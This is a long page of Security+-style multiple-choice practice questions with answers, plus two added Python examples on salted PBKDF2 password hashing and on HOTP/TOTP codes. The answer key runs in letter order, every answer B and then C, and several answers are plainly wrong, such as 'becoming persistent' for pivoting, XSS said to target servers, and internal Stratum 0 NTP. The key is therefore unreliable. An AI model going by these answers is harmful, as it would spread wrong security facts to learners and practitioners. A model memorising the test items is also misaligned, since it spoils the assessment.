A manager wants to distribute a report to several other managers within the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE) A. S/MIME B. SSH C. SNMPv3 D. FTPS E. SRTP F. HTTPS G. LDAPS
B. SSH D. FTPS F. HTTPS
An achievement in providing worldwide Internet security was the signing of certificates associated with which of the following protocols? A. TCP/IP B. SSL C. SCP D. SSH
B. SSL
Which of the following can use RC4 for encryption? (Select TWO). A. CHAP B. SSL C. WEP D. AES E. 3DES
B. SSL C. WEP
A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements? (Select TWO) A. Multifactor authentication B. SSO C. Biometrics D. PKI E. Federation
B. SSO E. Federation
Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed? A. Nonce B. Salt C. OTP D. Block cipher E. IV
B. Salt
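Salting in practice, as an added example that is not part of the study set; it also serves the unsalted-MD5 database question earlier on this page. It puts the unsalted legacy hash next to a salted, slow PBKDF2-HMAC-SHA256 hash and runs the lookup-table attack that works against the first and not the second. Usernames, passwords, the table contents and the iteration count are constructed for the example.

```python
import hashlib
import hmac
import os

# Work factor for PBKDF2-HMAC-SHA256. OWASP's 2023 guidance is 600,000; it is lower here
# only so the example runs quickly (an assumption for illustration, not a recommendation).
ITERATIONS = 100_000

def legacy_md5(password):
    """What the scanner reported: unsalted, fast MD5. Equal passwords give equal hashes,
    so one precomputed (rainbow) table breaks every account that shares a password."""
    return hashlib.md5(password.encode()).hexdigest()

def hash_password(password, salt=None, iterations=ITERATIONS):
    """Random per-user salt plus a slow KDF; the output carries what verification needs."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())

def verify_password(password, stored):
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))

def rainbow_table_hits(stored_hashes, table):
    """The offline attack: look each stored hash up in a precomputed hash -> password table.
    Every hit is a recovered credential; the lookup only works when hashes are unsalted."""
    return {user: table[h] for user, h in stored_hashes.items() if h in table}
```

Two users with the same password get two different salted hashes, so a table built against one is useless against the other, and the attacker is pushed back to guessing per account at the cost of the KDF's work factor.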
Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications? A. Staging environment B. Sandboxing C. Secure baseline D. Trusted OS
B. Sandboxing
A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart of a popular website, allowing the shopper to modify the price of an item at checkout. Which of the following BEST describes this type of user? A. Insider B. Script kiddie C. Competitor D. Hacktivist E. APT
B. Script kiddie
The Chief Technical Officer (CTO) has been informed of a potential fraud committed by a database administrator performing several other job functions within the company. Which of the following is the BEST method to prevent such activities in the future? A. Job rotation B. Separation of duties C. Mandatory Vacations D. Least Privilege
B. Separation of duties
A security analyst is securing a PACS. One of the requirements is network isolation with no access to the Internet or networked computers. Given this scenario, which of the following should the analyst implement to BEST address this requirement? A. Set up a firewall rule blocking ports 80 and 443. B. Set up an air-gapped environment. C. Set up a router and configure an ACL. D. Set up a segmented VLAN.
B. Set up an air-gapped environment.
An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal? A. Transitive trust B. Single sign-on C. Federation D. Secure token
B. Single sign-on
When used together, which of the following qualify as two-factor authentication? A. Password and PIN B. Smart card and PIN C. Proximity card and smart card D. Fingerprint scanner and iris scanner
B. Smart card and PIN
An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described? A. Replay B. Spoofing C. DNS poisoning D. Client-side attack
B. Spoofing
A system administrator is using a packet sniffer to troubleshoot remote authentication. The administrator detects a device trying to communicate to TCP port 49. Which of the following authentication methods is MOST likely being attempted? A. RADIUS B. TACACS+ C. Kerberos D. LDAP
B. TACACS+
A systems administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites? A. Extended domain validation B. TLS host certificate C. OCSP stapling D. Wildcard certificate
B. TLS host certificate
A security technician has been asked to recommend an authentication mechanism that will allow users to authenticate using a password that will only be valid for a predefined time interval. Which of the following should the security technician recommend? A. CHAP B. TOTP C. HOTP D. PAP
B. TOTP
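The time-limited password from the question, as an added example that is not part of the study set: HOTP (RFC 4226) and TOTP (RFC 6238) implemented over the standard library, with the verifier's drift window. The secret is the RFC's published test key rather than anything from this page, so the codes can be checked against the RFC's own vectors.

```python
import hashlib
import hmac
import struct
import time

def hotp(secret, counter, digits=6, algorithm="sha1"):
    """RFC 4226: HMAC over the 8-byte big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), getattr(hashlib, algorithm)).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret, unix_time=None, step=30, digits=6, algorithm="sha1"):
    """RFC 6238: the counter becomes the number of `step`-second windows since the epoch,
    so a code is valid for one window and then expires on its own (the HOTP counter
    only moves when a code is used, which is why HOTP codes do not time out)."""
    unix_time = time.time() if unix_time is None else unix_time
    return hotp(secret, int(unix_time) // step, digits, algorithm)

def totp_valid(secret, code, unix_time, step=30, digits=6, skew=1):
    """Verifier side: accept the current window plus `skew` windows either side for clock
    drift, comparing in constant time. Older codes are refused, which defeats replay."""
    counter = int(unix_time) // step
    return any(hmac.compare_digest(hotp(secret, counter + d, digits), code)
               for d in range(-skew, skew + 1))
```

A production verifier also records the last accepted window per user so a code cannot be replayed within its own 30-second lifetime.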
Pete, a security analyst, has been informed that the development team has plans to develop an application which does not meet the company's password policy. Which of the following should Pete do NEXT? A. Contact the Chief Information Officer and ask them to change the company password policy so that the application is made compliant. B. Tell the application development manager to code the application to adhere to the company's password policy. C. Ask the application development manager to submit a risk acceptance memo so that the issue can be documented. D. Inform the Chief Information Officer of non-adherence to the security policy so that the developers can be reprimanded.
B. Tell the application development manager to code the application to adhere to the company's password policy.
A network administrator is downloading the latest software for the organization's core switch. The downloads page allows users to view the checksum values for the available files. The network administrator is shown the following when viewing the checksum values for the TB_16.swi file:
Checksum values for the downloaded file:
MD5     d50b2b04cfb168eec8
SHA1    6a49065705a43de83dfa9e94
SHA256  7123fb644fbabdda6a73f6e6bc833e2cf12
After downloading the file, the network administrator runs a command that shows the following output:
Algorithm  Hash                                   Path
SHA256     5fdbbfb644fbabdda000006e6bc833e2c968   C:\Users\bsmith\TB_16.swi
SHA256     64ccbfbaf4fb96dda6a7373e9bcf62e3c244   C:\Users\bsmith\AA_15.swi
SHA1       12fec6aabc9ce87fee654abc               C:\Users\bsmith\KB_09.swi
MD5        5fdbbfb644fbadda6                      C:\Users\bsmith\KA_01.swi
Which of the following can be determined from the above output? A. The download file was only hashed with SHA-256. B. The download file has been corrupted or tampered with. C. The download file should not be used because it was not hashed with MD5. D. The download file should not be used because its hash differs from the hash of AA_15.swi
B. The download file has been corrupted or tampered with.
A technician receives a device with the following anomalies: Frequent pop-up ads Slow response-time switching between active programs Unresponsive peripherals The technician reviews the following log file entries: File Name Source MD5 Target MD5 Status antivirus.exe F794F21CD33E4F57890DDEA5CF267ED2 F794F21CD33E4F57890DDEA5CF267ED2 Automatic iexplore.exe 7FAAF21CD33E4F57890DDEA5CF29CCEA AA87F21CD33E4F57890DDEAEE2197333 Automatic service.exe 77FF390CD33E4F57890DDEA5CF28881F 77FF390CD33E4F57890DDEA5CF28881F Manual USB.exe E289F21CD33E4F57890DDEA5CF28EDC0 E289F21CD33E4F57890DDEA5CF28EDC0 Stopped Based on the above output, which of the following should be reviewed? A. The web application firewall B. The file integrity check C. The data execution prevention D. The removable media control
B. The file integrity check
A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the preupdate area of the OS, which indicates it was pushed from the central patch system. File: winx86_adobe_flash_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 The administrator pulls a report from the patch management system with the following output: Install Date Package Name Target Device Hash 10/10/2017 java_11.2_x64.exe HQ PC's 01ab28bbde63aa879b35bba62cdea282 10/10/2017 winx86_adobe_flash_upgrade.exe HQ PC's 99ac28bede43ab86b853ba62c4ea243 Given the above output, which of the following MOST likely happened? A. The file was corrupted after it left the patch system B. The file was infected when the patch manager downloaded it C. The file was not approved in the application whitelist system D. The file was embedded with a logic bomb to evade detection
B. The file was infected when the patch manager downloaded it
A developer wants to use an open source, third-party plug-in. The developer downloads the plug-in from the provider's website and from a mirror site that runs the files through an integrity-checking hash. The output of each file is shown below: fileA: BA411c782AD521740123456789ABCDEF fileB: BA411c782AD521740123456789ABCDEF Which of the following statements BEST summarizes what conclusion the developer can draw from the above results? A. The files have both been compromised because the numeric and letter sequence indicates an error. B. The integrity checksum is MD5 and cannot be assumed reliable. C. Given the output, the developer can assume there is no integrity compromise. D. The MD5 and SHA-1 checksums match, so the files have not been compromised.
B. The integrity checksum is MD5 and cannot be assumed reliable.
Due to regulatory requirements, servers in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization? A. The server should connect to external Stratum 0 NTP servers for synchronization B. The server should connect to internal Stratum 0 NTP servers for synchronization C. The server should connect to external Stratum 1 NTP servers for synchronization D. The server should connect to internal Stratum 1 NTP servers for synchronization
B. The server should connect to internal Stratum 0 NTP servers for synchronization
A security audit identifies a number of large email messages being sent by a specific user from their company email account to another address external to the company. These messages were sent prior to a company data breach, which prompted the security audit. The user was one of a few people who had access to the leaked data. Review of the suspect's emails show they consist mostly of pictures of the user at various locations during a recent vacation. No suspicious activities from other users who have access to the data were discovered. Which of the following is occurring? A. The user is encrypting the data in the outgoing messages. B. The user is using steganography. C. The user is spamming to obfuscate the activity. D. The user is using hashing to embed data in the emails.
B. The user is using steganography.
A corporation is concerned that, if a mobile device is lost, any sensitive information on the device could be accessed by third parties. Which of the following would BEST prevent this from happening? A. Initiate remote wiping on lost mobile devices. B. Use FDE and require PINs on all mobile devices. C. Use geolocation to track lost devices. D. Require biometric logins on all mobile devices.
B. Use FDE and require PINs on all mobile devices.
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details: Certificate 1 Certificate Path: Geotrust Global CA *company.com Certificate 2 Certificate Path: *company.com Which of the following would resolve the problem? A. Use a wildcard certificate. B. Use certificate chaining. C. Use a trust model. D. Use an extended validation certificate.
B. Use certificate chaining.
Datacenter employees have been battling alarms in a datacenter that has been experiencing hotter than normal temperatures. The server racks are designed so all 48 rack units are in use, and servers are installed in any manner in which the technician can get them installed. Which of the following practices would BEST alleviate the heat issues and keep costs low? A. Utilize exhaust fans. B. Use hot and cold aisles. C. Airgap the racks. D. Use a secondary AC unit.
B. Use hot and cold aisles.
A network engineer is setting up a network for a company. There is a BYOD policy for the employees so that they can connect their laptops and mobile devices. Which of the following technologies should be employed to separate the administrative network from the network in which all of the employees' devices are connected? A. VPN B. VLAN C. WPA2 D. MAC filtering
B. VLAN
A security administrator wants to perform routine tests on the network during working hours when certain applications are being accessed by the most people. Which of the following would allow the security administrator to test the lack of security controls for those applications with the least impact to the system? A. Penetration test B. Vulnerability scan C. Load testing D. Port scanner
B. Vulnerability scan
A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now? A. Agile B. Waterfall C. Scrum D. Spiral
B. Waterfall
Which of the following is a major difference between XSS attacks and remote code exploits? A. XSS attacks use machine language, while remote exploits use interpreted language. B. XSS attacks target servers, while remote code exploits target clients. C. Remote code exploits aim to escalate attackers' privileges, while XSS attacks aim to gain access only. D. Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work.
B. XSS attacks target servers, while remote code exploits target clients.
An administrator wants to establish a WiFi network using a high gain directional antenna with a narrow radiation pattern to connect two buildings separated by a very long distance. Which of the following antennas would be BEST for this situation? A. Dipole B. Yagi C. Sector D. Omni
B. Yagi
A public announcement is made about a newly discovered, rapidly spreading virus. The security team immediately updates and applies all its antivirus signatures. The security manager contacts the antivirus vendor support team to ask why one of the systems was infected. The vendor support team explains that a signature update is not available for this virus yet. Which of the following BEST describes this situation? A. Race condition B. Zero day C. Lack of vendor support D. Untrained users
B. Zero day
A security analyst, Ann, is reviewing an IRC channel and notices that a malicious exploit has been created for a frequently used application. She notifies the software vendor and asks them for remediation steps, but is alarmed to find that no patches are available to mitigate this vulnerability. Which of the following BEST describes this exploit? A. Malicious insider threat B. Zero-day C. Client-side attack D. Malicious add-on
B. Zero-day
Using a heuristic system to detect an anomaly in a computer's baseline, a system administrator was able to detect an attack even though the company's signature-based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port, and executed it to trigger a privilege escalation flaw. Which of the following attacks has MOST likely occurred? A. Cookie stealing B. Zero-day C. Directory traversal D. XML injection
B. Zero-day
When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are: A. escalating privilege B. becoming persistent C. fingerprinting D. pivoting
B. becoming persistent
A company policy regarding the shredding of proprietary documents is MOST likely designed to prevent: A. impersonation B. dumpster diving C. piggybacking D. identity theft
B. dumpster diving
Vendor diversity is considered an architectural best practice because: A. it prevents vulnerabilities from spreading from device to device in a crisis. B. it mitigates the risk of a programming flaw affecting the entire architecture. C. it allows for more user training to be conducted on different equipment. D. it transfers the risk associated with vulnerable devices to multiple vendors.
B. it mitigates the risk of a programming flaw affecting the entire architecture.
An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 PCs active on the network. The Chief Information Security Officer (CISO) suggests that the organization employ desktop imaging technology for such a large-scale upgrade. Which of the following is a security benefit of implementing an imaging solution? A. it allows for faster deployment B. it provides a consistent baseline C. It reduces the number of vulnerabilities D. It decreases the boot time
B. it provides a consistent baseline
A malicious person gained access to a datacenter by ripping the proximity badge reader off the wall near the datacenter entrance. This caused the electronic locks on the datacenter door to release because the: A. badge reader was improperly installed. B. system was designed to fail open for life-safety. C. system was installed in a fail closed configuration. D. system used magnetic locks and the locks became demagnetized.
B. system was designed to fail open for life-safety.
Alex is conducting forensics of a phishing email. She knows the IP address of the originating email server. What command would show Alex the complete path to that IP address? A. ping B. tracert C. netstat D. nslookup
B. tracert
In which of the following scenarios is PKI LEAST hardened? A. The CRL is posted to a publicly accessible location. B. The recorded time offsets are developed with symmetric keys. C. A malicious CA certificate is loaded on all the clients. D. All public keys are accessed by an unauthorized user.
C. A malicious CA certificate is loaded on all the clients.
A security administrator needs to configure remote access to a file share so it can only be accessed between the hours of 9:00 a.m. and 5:00 p.m. Files in the share can only be accessed by members of the same department as the data owner. Users should only be able to create files with approved extensions, which may differ by department. Which of the following access controls would be the MOST appropriate for this situation? A. RBAC B. MAC C. ABAC D. DAC
C. ABAC
An organization's Chief Executive Officer (CEO) directs a newly hired computer technician to install an OS on the CEO's personal laptop. The technician performs the installation, and a software audit later in the month indicates a violation of the EULA occurred as a result. Which of the following would address this violation going forward? A. Security configuration baseline B. Separation of duties C. AUP D. NDA
C. AUP
A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using? A. Escalation of privilege B. SQL injection C. Active reconnaissance D. Proxy server
C. Active reconnaissance
Several employees submit the same phishing email to the administrator. The administrator finds that the links in the email are not being blocked by the company's security device. Which of the following might the administrator do in the short term to prevent the emails from being received? A. Configure an ACL B. Implement a URL filter C. Add the domain to a block list D. Enable TLS on the mail server
C. Add the domain to a block list
When sending messages using symmetric encryption, which of the following must happen FIRST? A. Exchange encryption key B. Establish digital signatures C. Agree on an encryption method D. Install digital certificates
C. Agree on an encryption method
A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops' local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this? A. Put the desktops in the DMZ. B. Create a separate VLAN for the desktops. C. Air gap the desktops. D. Join the desktops to an ad-hoc network.
C. Air gap the desktops.
A member of the admins group reports being unable to modify the "changes" file on a server. The permissions on the file are as follows: Permissions User Group File -rwxrw-r--+ Admins Admins changes Based on the output above, which of the following BEST explains why the user is unable to modify the "changes" file? A. The SELinux mode on the server is set to "enforcing." B. The SELinux mode on the server is set to "permissive." C. An FACL has been added to the permissions for the file. D. The admins group does not have adequate permissions to access the file.
C. An FACL has been added to the permissions for the file.
A network administrator is responsible for securing applications against external attacks. Every month, the underlying operating system is updated. There is no process in place for other software updates. Which of the following processes could MOST effectively mitigate these risks? A. Application hardening B. Application change management C. Application patch management D. Application firewall review
C. Application patch management
Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices on their home network? A. Power off the devices when they are not in use B. Prevent IoT devices from contacting the Internet directly C. Apply firmware and software updates upon availability D. Deploy a bastion host on the home network
C. Apply firmware and software updates upon availability
A security analyst is reviewing the following company requirements prior to selecting the appropriate technical control configuration parameter: RTO: 2 days RPO: 36 hours MTTR: 24 hours MTBF: 60 days Which of the following solutions will address the RPO requirements? A. Remote Syslog facility collecting real-time events B. Server farm behind a load balancer delivering five-nines uptime C. Backup solution that implements daily snapshots D. Cloud environment distributed across geographic regions
C. Backup solution that implements daily snapshots
A company has a data classification system with definitions for "Private" and "Public". The company's security policy outlines how data should be protected based on type. The company recently added the data type "Proprietary". Which of the following is the MOST likely reason the company added this data type? A. Reduced cost B. More searchable data C. Better data classification D. Expanded authority of the privacy officer
C. Better data classification
A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO) A. Install an additional firewall B. Implement a redundant email server C. Block access to personal email on corporate systems D. Update the X.509 certificates on the corporate email server E. Update corporate policy to prohibit access to social media websites F. Review access violation on the file server
C. Block access to personal email on corporate systems E. Update corporate policy to prohibit access to social media websites
Which of the following can be used by a security administrator to successfully recover a user's forgotten password on a password protected file? A. Cognitive password B. Password sniffing C. Brute force D. Social engineering
C. Brute force
A developer has incorporated routines into the source code for controlling the length of the input passed to the program. Which of the following types of vulnerabilities is the developer protecting the code against? A. DLL injection B. Memory leak C. Buffer overflow D. Pointer dereference
C. Buffer overflow
A malicious individual is attempting to write too much data to an application's memory. Which of the following describes this type of attack? A. Zero-day B. SQL injection C. Buffer overflow D. XSRF
C. Buffer overflow
An application developer has neglected to include input validation checks in the design of the company's new web application. An employee discovers that repeatedly submitting large amounts of data, including custom code, to an application will allow the execution of the custom code at the administrator level. Which of the following BEST identifies this application attack? A. Cross-site scripting B. Clickjacking C. Buffer overflow D. Replay
C. Buffer overflow
Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? A. Pivoting B. Process affinity C. Buffer overflow D. XSS
C. Buffer overflow
Which of the following MUST be updated immediately when an employee is terminated to prevent unauthorized access? A. Registration B. CA C. CRL D. Recovery agent
C. CRL
Which of the following should Jane, a security administrator, perform before a hard drive is analyzed with forensics tools? A. Identify user habits B. Disconnect system from network C. Capture system image D. Interview witnesses
C. Capture system image
The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is receiving reports that users are experiencing the following error when attempting to log in to their previous system: Logon Failure: Access Denied Which of the following can cause this issue? A. Permission issues B. Access violations C. Certificate issues D. Misconfigured devices
C. Certificate issues
An organization was recently compromised by an attacker who used a server certificate with the company's domain issued by an irreputable CA. Which of the following should be used to mitigate this risk in the future? A. OCSP B. DNSSEC C. Certificate pinning D. Key escrow
C. Certificate pinning
A compromised workstation utilized in a Distributed Denial of Service (DDOS) attack has been removed from the network and an image of the hard drive has been created. However, the system administrator stated that the system was left unattended for several hours before the image was created. In the event of a court case, which of the following is likely to be an issue with this incident? A. Eye Witness B. Data Analysis of the hard drive C. Chain of custody D. Expert Witness
C. Chain of custody
Which of the following mitigation strategies is established to reduce risk when performing updates to business critical systems? A. Incident management B. Server clustering C. Change management D. Forensic analysis
C. Change management
Sara, a security architect, has developed a framework in which several authentication servers work together to increase processing power for an application. Which of the following does this represent? A. Warm site B. Load balancing C. Clustering D. RAID
C. Clustering
An administrator has a network subnet dedicated to a group of users. Due to concerns regarding data and network security, the administrator desires to provide network access for this group only. Which of the following would BEST address this desire? A. Install a proxy server between the users' computers and the switch to filter inbound network traffic. B. Block commonly used ports and forward them to higher and unused port numbers. C. Configure the switch to allow only traffic from computers based upon their physical address. D. Install host-based intrusion detection software to monitor incoming DHCP Discover requests.
C. Configure the switch to allow only traffic from computers based upon their physical address.
Which of the following security strategies allows a company to limit damage to internal systems and provides loss control? A. Restoration and recovery strategies B. Deterrent strategies C. Containment strategies D. Detection strategies
C. Containment strategies
During a lessons learned meeting regarding a previous incident, the security team receives a follow-up action item with the following requirements: Allow authentication from within the United States anytime Allow authentication if the user is accessing email or a shared file system. Do not allow authentication if the AV program is two days out of date Do not allow authentication if the location of the device is in two specific countries Given the requirements, which of the following mobile deployment authentication types is being utilized? A. Geofencing authentication B. Two-factor authentication C. Context-aware authentication D. Biometric authentication
C. Context-aware authentication
Which of the following is being tested when a company's payroll server is powered off for eight hours? A. Succession plan B. Business impact document C. Continuity of operations plan D. Risk assessment plan
C. Continuity of operations plan
A security engineer implements multiple technical measures to secure an enterprise network. The engineer also works with the Chief Information Officer (CIO) to implement policies to govern user behavior. Which of the following is the security engineer executing? A. Baselining B. Mandatory access control C. Control diversity D. System hardening
C. Control diversity
Matt, the IT Manager, wants to create a new network available to virtual servers on the same hypervisor, and does not want this network to be routable to the firewall. How could this BEST be accomplished? A. Create a VLAN without a default gateway. B. Remove the network from the routing table. C. Create a virtual switch. D. Commission a stand-alone switch.
C. Create a virtual switch.
A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed? A. Non-intrusive B. Authenticated C. Credentialed D. Active
C. Credentialed
An employee is having issues when attempting to access files on a laptop. The machine was previously running slow, and many files were not accessible. The employee is not able to access the hard drive the next day, and all file names were changed to some random names. Which of the following BEST represents what compromised the machine? A. Ransomware B. Worm C. Crypto-malware D. RAT
C. Crypto-malware
Which of the following is the primary security concern when deploying a mobile device on a network? A. Strong authentication B. Interoperability C. Data security D. Cloud storage technique
C. Data security
A company decides to implement a BYOD policy and is concerned about how to implement the proper controls to secure its mobile devices. Which of the following security approaches can the company implement to ensure its mobile devices are secured? A. Use FDE with key escrow. B. Allow the use of the camera, the microphone, and removable media. C. Deploy a custom SEAndroid policy. D. Implement security awareness training. E. Configure a customer MAC policy.
C. Deploy a custom SEAndroid policy.
An employee has been writing a secure shell around software used to secure executable files. The employee has conducted the appropriate self-test and is ready to move the software into the next environment. Within which of the following environments is the employee currently working? A. Staging B. Test C. Development D. Production
C. Development
Matt, a security analyst, needs to select an asymmetric encryption method that allows for the same level of encryption strength with a lower key length than is typically necessary. Which of the following encryption methods offers this capability? A. Twofish B. Diffie-Hellman C. ECC D. RSA
C. ECC
An auditor confirms the risk associated with a Windows-specific vulnerability, which was discovered by the company's security tool, does not apply due to the server running a Linux OS. Which of the following does this BEST describe? A. Inherent risk B. Attack vector C. False positive D. Remediation
C. False positive
Which of the following can result in significant administrative overhead from incorrect reporting? A. Job rotation B. Acceptable usage policies C. False positives D. Mandatory vacations
C. False positives
A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises? A. Air gap B. Infrared detection C. Faraday cage D. Protected distributions
C. Faraday cage
The Chief Information Security Officer (CISO) of an organization has tasked the security analysis team with researching and developing a multifactor authentication alternative to the existing single-factor version. The team decides that multifactor, for this organization, will mean three separate and distinct authentication methods. Which of the following options BEST meets this requirement? A. Retina scan, blood sample, token B. Token, certificate, voice recognition C. Fingerprint, token, challenge question D. PIV, token, challenge question
C. Fingerprint, token, challenge question
Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of physical servers. Which of the following is the BEST method for Joe to use? A. Differential B. Incremental C. Full D. Snapshots
C. Full
A security engineer wants to add SSL to the public server. Which of the following would be the FIRST step to implement the SSL certificate? A. Download the web certificate. B. Install the intermediate certificate. C. Generate a CSR. D. Encrypt the private key.
C. Generate a CSR.
An organization has hired a new remote workforce. Many new employees are reporting that they are unable to access the shared network resources while traveling. They need to be able to travel to and from different locations on a weekly basis. Shared offices are retained at the headquarters location. The remote workforce will have identical file and system access requirements, and must also be able to log in to the headquarters location remotely. Which of the following BEST represent how the remote employees should have been set up initially? (Select TWO) A. User-based access control B. Shared accounts C. Group-based access control D. Roaming profiles E. Individual accounts F. Location-based policies
C. Group-based access control D. Roaming profiles
Which of the following could cause a browser to display the message below? "The security certificate presented by this website was issued for a different website's address." A. The website certificate was issued by a different CA than what the browser recognizes in its trusted CAs. B. The website is using a wildcard certificate issued for the company's domain. C. HTTPS://127.0.01 was used instead of HTTPS://localhost. D. The website is using an expired self signed certificate.
C. HTTPS://127.0.01 was used instead of HTTPS://localhost.
Which of the following should be connected to the fire alarm system in order to help prevent the spread of a fire in a server room without data loss to assist in an FM-200 deployment? A. Water base sprinkler system B. Electrical C. HVAC D. Video surveillance
C. HVAC
An organization electronically processes sensitive data within a controlled facility. The Chief Information Security Officer (CISO) wants to limit emissions from emanating from the facility. Which of the following mitigates this risk? A. Upgrading facility cabling to a higher standard of protected cabling to reduce the likelihood of emission spillage. B. Hardening the facility through the use of secure cabinetry to block emissions. C. Hardening the facility with a Faraday cage to contain emissions produced from data processing. D. Employing security guards to ensure unauthorized personnel remain outside of the facility.
C. Hardening the facility with a Faraday cage to contain emissions produced from data processing.
A company is trying to implement physical deterrent controls to improve the overall security posture of their data center. Which of the following BEST meets their goal? A. Visitor logs B. Firewall C. Hardware locks D. Environmental monitoring
C. Hardware locks
A Chief Information Security Officer (CISO) is concerned about insider threats compromising credentials related to service accounts on internal servers. A security analyst is tasked with developing a solution that will allow for the collection and analysis of log data in a simulated environment, which represents the production environment. Which of the following solutions would BEST satisfy the CISO's requirements? A. Bastion host B. Evil twin C. Honeynet D. Vampire tap E. Script kiddie
C. Honeynet
Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and notices the following output: 2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE 2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVE Which of the following is MOST likely preventing Ann from accessing the application from the desktop? A. Web application firewall B. DLP C. Host-based firewall D. UTM E. Network-based firewall
C. Host-based firewall
An organization wants to ensure network access is granted only after a user or device has been authenticated. Which of the following should be used to achieve this objective for both wired and wireless networks? A. CCMP B. PKCS#12 C. IEEE 802.1X D. OCSP
C. IEEE 802.1X
Which of the following pseudocodes can be used to handle program exceptions? A. If program detects another instance of itself, then kill program instance. B. If user enters invalid input, then restart program. C. If program module crashes, then restart program module. D. If user's input exceeds buffer length, then truncate the input.
C. If program module crashes, then restart program module.
A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing? A. Phishing B. Shoulder surfing C. Impersonation D. Dumpster diving
C. Impersonation
A company is deploying a file-sharing protocol across a network and needs to select a protocol for authenticating clients. Management requests that the service be configured in the most secure way possible. The protocol must also be capable of mutual authentication, and support SSO and smart card logons. Which of the following would BEST accomplish this task? A. Store credentials in LDAP. B. Use NTLM authentication. C. Implement Kerberos. D. Use MSCHAP authentication.
C. Implement Kerberos.
During an assessment of a manufacturing plant, a security analyst finds several end-of-life programmable logic controllers (PLCs), which have firmware that was last updated three years ago and have known vulnerabilities. Which of the following BEST mitigates the risks associated with the PLCs? A. Deploy HIDS on each device. B. Remove the PLCs from the manufacturing infrastructure. C. Implement network segmentation to isolate the devices. D. Perform file integrity monitoring against the devices.
C. Implement network segmentation to isolate the devices.
A security administrator is developing a methodology for tracking staff access to patient data. Which of the following would be the BEST method of creating audit trails for usage reports? A. Deploy file integrity checking B. Restrict access to the database by following the principle of least privilege C. Implementing a database activity monitoring system D. Created automated alerts on the IDS system for the database server
C. Implementing a database activity monitoring system
Which of the following is being described when a security professional develops and publishes a password policy specifically tailored to a company, and enforces the policy through technical means? A. Applying vendor-specific configurations. B. Developing regulatory frameworks. C. Implementing security control diversity. D. Creating security benchmarks.
C. Implementing security control diversity.
Matt, a developer, recently attended a workshop on a new application. The developer installs the new application on a production system to test the functionality. Which of the following is MOST likely affected? A. Application design B. Application security C. Initial baseline configuration D. Management of interfaces
C. Initial baseline configuration
A security manager discovers the most recent vulnerability scan report illustrates low-level, non-critical findings. Which of the following scanning concepts would BEST report critical threats? A. Non-credentialed scan B. Compliance scan C. Intrusive scan D. Application scan
C. Intrusive scan
Joe, a senior systems administrator, must leave for a family emergency. While Joe is absent, another systems administrator discovers Joe stole confidential company information. Which of the following organizational procedures would have detected this breach sooner? A. Background check B. Separation of duties C. Job rotation D. Rules of behavior E. Non-disclosure agreement
C. Job rotation
